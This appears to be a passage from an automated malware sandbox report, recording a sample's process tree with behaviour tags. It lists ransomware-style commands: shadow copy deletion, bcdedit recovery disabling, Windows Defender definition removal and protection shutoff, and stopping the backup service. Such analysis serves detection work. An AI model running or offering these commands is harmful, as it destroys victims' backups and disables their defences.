C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1108 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1552 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:872 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1184
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1800 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:8
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3464 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2092
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y1⤵PID:3580
Network
MITRE ATT&CK Enterprise v6
Downloads